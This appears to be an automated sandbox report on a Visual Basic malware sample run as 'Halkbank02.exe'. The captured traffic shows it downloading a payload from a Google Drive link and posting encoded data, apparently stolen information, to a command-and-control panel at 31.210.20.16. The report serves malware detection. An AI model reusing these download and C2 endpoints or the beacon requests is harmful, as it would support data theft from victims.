                                                                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaStrBool, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaI2I4, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaInStrB, __vbaLateMemCall, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0404 0x04b0
                                                                              LegalCopyrightGeneral court
                                                                              InternalNamemeduse
                                                                              FileVersion66.00
                                                                              CompanyNameGeneral court
                                                                              LegalTrademarksGeneral court
                                                                              CommentsGeneral court
                                                                              ProductNameGeneral court
                                                                              ProductVersion66.00
                                                                              FileDescriptionGeneral court
                                                                              OriginalFilenamemeduse.exe

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              ChineseTaiwan

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Sep 15, 2021 10:52:36.727138042 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:36.727184057 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:36.727322102 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:36.763228893 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:36.763253927 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:36.850737095 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:36.850878954 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:36.851133108 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:36.851320982 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:37.386229992 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:37.386261940 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:37.387064934 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:37.387141943 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:37.398622036 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:37.439148903 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:38.115643024 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:38.115761042 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:38.115782022 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:38.116333008 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:38.123533010 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:38.123778105 CEST44349822172.217.168.78192.168.2.3
                                                                              Sep 15, 2021 10:52:38.123999119 CEST49822443192.168.2.3172.217.168.78
                                                                              Sep 15, 2021 10:52:38.221760035 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.221817970 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.221951008 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.223767996 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.223803043 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.300553083 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.300719976 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.300851107 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.301050901 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.316487074 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.316514015 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.316852093 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.316924095 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.318101883 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.359139919 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.584198952 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.584487915 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.586935997 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.587187052 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.588128090 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.588294029 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.591594934 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.591718912 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.591890097 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.591909885 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.591922045 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.592945099 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.593631983 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.594676971 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.594702959 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.595757008 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.609038115 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.609828949 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.609849930 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.609878063 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.609894037 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.610002041 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.610007048 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.611521006 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.613282919 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.613302946 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.613413095 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.613431931 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.613441944 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.614718914 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.615241051 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.616919041 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.616950989 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.617069960 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.617105007 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.617153883 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.617199898 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.618582964 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.620316982 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.620357990 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.620321989 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.620382071 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.622005939 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.622071981 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.623636007 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.623646975 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.623734951 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.623779058 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.623791933 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.623879910 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.623884916 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.625284910 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.626708031 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.626720905 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.626864910 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.628360987 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.628401041 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.628463030 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.628479004 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.628592014 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.628598928 CEST49825443192.168.2.3172.217.168.65
                                                                              Sep 15, 2021 10:52:38.629933119 CEST44349825172.217.168.65192.168.2.3
                                                                              Sep 15, 2021 10:52:38.631861925 CEST44349825172.217.168.65192.168.2.3

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Sep 15, 2021 10:47:36.130261898 CEST53512818.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:47:38.652338028 CEST4919953192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:47:38.685915947 CEST53491998.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:00.428745031 CEST5062053192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:00.471328020 CEST53506208.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:15.982464075 CEST6493853192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:16.017405033 CEST53649388.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:29.456933975 CEST6015253192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:29.486416101 CEST53601528.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:47.137450933 CEST5754453192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:47.184797049 CEST53575448.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:48.248011112 CEST5598453192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:48.333154917 CEST53559848.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:48.984532118 CEST6418553192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:49.028301001 CEST53641858.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:49.669214964 CEST6511053192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:49.730194092 CEST53651108.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:50.374609947 CEST5836153192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:50.456546068 CEST53583618.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:51.217565060 CEST6349253192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:51.244415998 CEST53634928.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:52.117394924 CEST6083153192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:52.154593945 CEST53608318.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:53.075970888 CEST6010053192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:53.125721931 CEST53601008.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:53.608927011 CEST5319553192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:53.653033972 CEST53531958.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:53.922380924 CEST5014153192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:53.948812008 CEST53501418.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:54.949160099 CEST5302353192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:54.978555918 CEST53530238.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:48:59.602610111 CEST4956353192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:48:59.640084028 CEST53495638.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:30.288563013 CEST5135253192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:30.316657066 CEST53513528.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:30.979020119 CEST5934953192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:31.006067038 CEST53593498.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:35.619613886 CEST5708453192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:35.660643101 CEST53570848.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:36.657840014 CEST5882353192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:36.690398932 CEST53588238.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:37.694060087 CEST5756853192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:37.723131895 CEST53575688.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:37.916222095 CEST5054053192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:37.953512907 CEST53505408.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:52:38.185825109 CEST5436653192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:52:38.219011068 CEST53543668.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:54:17.351571083 CEST5303453192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:54:17.353812933 CEST5776253192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:54:17.382644892 CEST53530348.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:54:17.384529114 CEST53577628.8.8.8192.168.2.3
                                                                              Sep 15, 2021 10:54:20.619842052 CEST5543553192.168.2.38.8.8.8
                                                                              Sep 15, 2021 10:54:20.655939102 CEST53554358.8.8.8192.168.2.3

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Sep 15, 2021 10:52:36.657840014 CEST192.168.2.38.8.8.80x748dStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                              Sep 15, 2021 10:52:38.185825109 CEST192.168.2.38.8.8.80x551fStandard query (0)doc-0g-c0-docs.googleusercontent.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Sep 15, 2021 10:52:30.316657066 CEST8.8.8.8192.168.2.30x79eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                              Sep 15, 2021 10:52:36.690398932 CEST8.8.8.8192.168.2.30x748dNo error (0)drive.google.com172.217.168.78A (IP address)IN (0x0001)
                                                                              Sep 15, 2021 10:52:38.219011068 CEST8.8.8.8192.168.2.30x551fNo error (0)doc-0g-c0-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                              Sep 15, 2021 10:52:38.219011068 CEST8.8.8.8192.168.2.30x551fNo error (0)googlehosted.l.googleusercontent.com172.217.168.65A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • drive.google.com
                                                                              • doc-0g-c0-docs.googleusercontent.com
                                                                              • 31.210.20.16

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.349822172.217.168.78443C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.349825172.217.168.65443C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.34982631.210.20.1680C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Sep 15, 2021 10:52:38.818655014 CEST7716OUTPOST /panel1/index.php HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                              Host: 31.210.20.16
                                                                              Content-Length: 109
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38
                                                                              Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
                                                                              Sep 15, 2021 10:52:39.099288940 CEST7717INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 15 Sep 2021 08:52:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              X-Powered-By: PHP/8.1.0RC1
                                                                              Data Raw: 31 66 32 31 0d 0a 31 69 f6 46 73 bb 7f 41 b1 3d 7e 84 5e 79 ba 46 7d f8 46 59 99 66 3e 86 4e 3e b0 43 73 fc 3c 47 a1 39 3b 85 59 7a 82 5b 4b f8 46 36 e7 6e 34 f4 63 34 61 18 53 e4 a8 1c d5 7b ab c3 10 68 6f 1a 5f e4 a6 00 96 7f ad c1 58 26 6c 59 17 f8 e8 5f d6 68 ae c1 07 46 5a f8 3a ca c5 6f f8 08 c2 ad 3d f4 ff 68 3a 71 c5 6f f8 0c c2 ad 3d 4b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d b3 00 68 3a c7 da d5 f6 0c 76 a4 f0 2a b8 69 76 04 e4 3b 90 65 b1 8d 4d 79 6f 0f 48 a8 a8 4f 9b 6d ac c3 52 7f 20 0a 5f e9 b7 1a 96 2c ab c3 1d 4f 4f 3b 1a a4 aa 0b 9d 22 cf a0 37 2f 00 68 3a c9 c5 6f f8 d7 af a6 fc 94 0c 0d a8 56 c9 0a 6a 93 ce c8 af e7 6e 0d a9 57 c9 0a 6a e0 ac cc ae 96 0c 0d a8 25 ab f5 6a 92 ce c8 af e7 6e 0f a9 57 c9 0a 6a 5e ab ce 55 94 0c 0d a8 99 80 6f f8 40 c3 af 3d 8a ba 4a 96 c9 c5 6f f8 0c c2 ad 3d eb 00 6a 1b c2 c4 61 f2 0c c4 ad 3d 0b 04 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 10 68 3a c9 e5 6f f8 0c c2 ad 2d 0b 10 68 3a c9 c7 6f f8 06 c2 ad 3d 01 00 68 3a c3 c5 6f f8 0c c2 ad 3d 0b 30 68 3a c9 c7 6f f8 00 88 ad 3d 08 00 28 3f c9 c5 6b f8 0c d2 ad 3d 0b 00 78 3a c9 d5 6f f8 0c c2 ad 3d 1b 00 68 3a c9 d4 6f f8 27 c1 ad 3d 0b 00 68 3a c9 c5 6f f8 0c e2 ad 3d fb 03 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 0c 68 3a f1 f8 6f f8 0c c2 ad 3d 0b 00 68 3a c9 d5 6f f8 58 c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 25 74 0d 42 bd c5 6f f8 27 c6 ad 3d 0b 10 68 3a c9 c3 6f f8 0c c0 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 2b 00 68 5a e7 b7 1c 8a 6f c2 ad 3d fb 03 68 3a c9 e5 6f f8 0c c6 ad 3d 0b 08 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a 89 c5 6f b8 0c c2 ad 3d 8a ba 4a 96 c9 c5 6f f8 0e c2 ad 3d 30 00 68 3a 9d d5 6f f8 58 c0 ad 3d 0b 00 68 3a 48 7f 4d 54 0c c2 ad 3d 06 00 68 3a ad c5 6f f8 9c d2 ad 3d 9b 02 68 3a c9 c5 6f f8 8d 78 8f 91 0b 00 68 3a d9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 5e 91 e9 6e 46 42 ad f9 1b 65 5a f5 4b 7b 95 ab 2c a3 0c cf c8 c5 6f f8 6d b2 c4 10 66 73 45 4d a0 ab 42 9b 63 b0 c8 10 68 6f 06 49 a6 a9 0a d5 60 f3 80 0c 26 30 46 4a ad a7 6f f8 0c c2 ad 3d 0b 10 68 3a 9d c5 6f f8 22 b0 c9 5c 7f 61 68 3a 9d d5 6f f8 a0 c2 ad 3d 25 72 0c 5b bd a4 4b 82 76 b8 c9 5f 6c 00 68 3a c9 d4 6f f8 27 c1 ad 3d 25 65 0c 5b bd a4 6f f8 0c e2 ad 3d 6b 00 68 3a e7 b7 1c 8a 6f e6 9d 0c 0b 00 68 3a a9 e5 6f f8 9c c1 ad 3d 25 72 1b 48 aa e1 5f ca 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a 48 7f 4d 54 0c c2 ad 3d bf 11 68 3a c8 c5 6f f8 02 c2 ad 3d 05 00 68 3a e1 d4 6f f8 6c d3 ad 3d 93 11 68 3a 2d d4 6f f8 0b d0 ad 3d 27 12 68 3a 9e d7 6f f8 9d d0 ad 3d c1 12 68 3a 3b d7 6f f8 16 d1 ad 3d 4c 13 68 3a a6 d6 6f f8 97 d1 ad 3d c2 13 68 3a 26 d6 6f f8 18 d6 ad 3d dc 11 68 3a 33 d4 6f f8 11 d0 ad 3d 4f 12 68 3a ba d7 6f f8 b4 d0 ad 3d ee 12 68 3a c1 d6 6f f8 39 d1 ad 3d 69 13 68 3a 4c d6 6f f8 b6 d1 ad 3d ea 13 68 3a cf d1 6f f8 0c c2 ac 3d 09 00 6b 3a cd c5 6a f8 0a c2 aa 3d 03 00 61 3a c3 c5 64 f8 00 c2 a0 3d 6a 70 01 17 a4 b6 42 8f 65 ac 80 5e 64 72 0d 17 aa aa 01 8b 63 ae c8 10 67 31 45 0b e4 f5 41 9c 60 ae ad 7c 67 6c 07 59 8a aa 01 8b 63 ae c8 3d 60 65 1a 54 ac a9 5c ca 22 83 c1 51 64 63 2b 55 a7 b6 00 94 69 c2 ea 58 7f 43 07 54 ba aa 03 9d 4f 92 ad 56 6e 72 06 5f a5 f6
                                                                              Data Ascii: 1f211iFsA=~^yF}FYf>N>Cs<G9;Yz[KF6n4c4aS{ho_X&lY_hFZ:o=h:qo=Kh:o=h:o=h:o=h:v*iv;eMyoHOmR _,OO;"7/h:oVjnWj%jnWj^Uo@=Jo=ja=h:o=h:o-h:o=h:o=0h:o=(?k=x:o=h:o'=h:o=h:o=h:o=h:oX=h:o=h:o=h:o=h:o=h:o=h:o=%tBo'=h:o=h:o=+hZo=h:o=h:o=h:o=Jo=0h:oX=h:HMT=h:o=h:oxh:o=h:o^nFBeZK{,omfsEMBchoI`&0FJo=h:o"\ah:o=%r[Kv_lh:o'=%e[o=kh:oh:o=%rH_=h:o=h:HMT=h:o=h:ol=h:-o='h:o=h:;o=Lh:o=h:&o=h:3o=Oh:o=h:o9=ih:Lo=h:o=k:j=a:d=jpBe^drcg1EA`|glYc=`eT\"Qdc+UiXCTOVnr_


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.34982731.210.20.1680C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Sep 15, 2021 10:52:53.101320028 CEST12407OUTPOST /panel1/index.php HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                              Host: 31.210.20.16
                                                                              Content-Length: 80859
                                                                              Cache-Control: no-cache
                                                                              Sep 15, 2021 10:52:53.259141922 CEST12487INHTTP/1.1 500 Internal Server Error
                                                                              Server: nginx
                                                                              Date: Wed, 15 Sep 2021 08:52:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 2
                                                                              Connection: close
                                                                              X-Powered-By: PHP/8.1.0RC1
                                                                              Data Raw: 4f 4b
                                                                              Data Ascii: OK


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.349822172.217.168.78443C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2021-09-15 08:52:37 UTC0OUTGET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2021-09-15 08:52:38 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Wed, 15 Sep 2021 08:52:38 GMT
                                                                              Location: https://doc-0g-c0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download
                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                              Content-Security-Policy: script-src 'nonce-9238vP7xpTV0qx4OY5htXg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Server: GSE
                                                                              Set-Cookie: NID=223=J80Jc1F0vTgp-dnBtHSZOlO1ggDDvohptyTEPpTFPS7baYCQ9WUDKECR9GLonAV0SJW-eHmg8Oa_qlyc9yRTwBedVfQ1YtALOz2Qz8jvhOl7PE5ZAbaXc8BjCPIK0OLumDDTSShpGHQf_8EF00N3Gd8HV9j0Q_Ruw9ahYxalNC8; expires=Thu, 17-Mar-2022 08:52:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                              Accept-Ranges: none
                                                                              Vary: Accept-Encoding
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
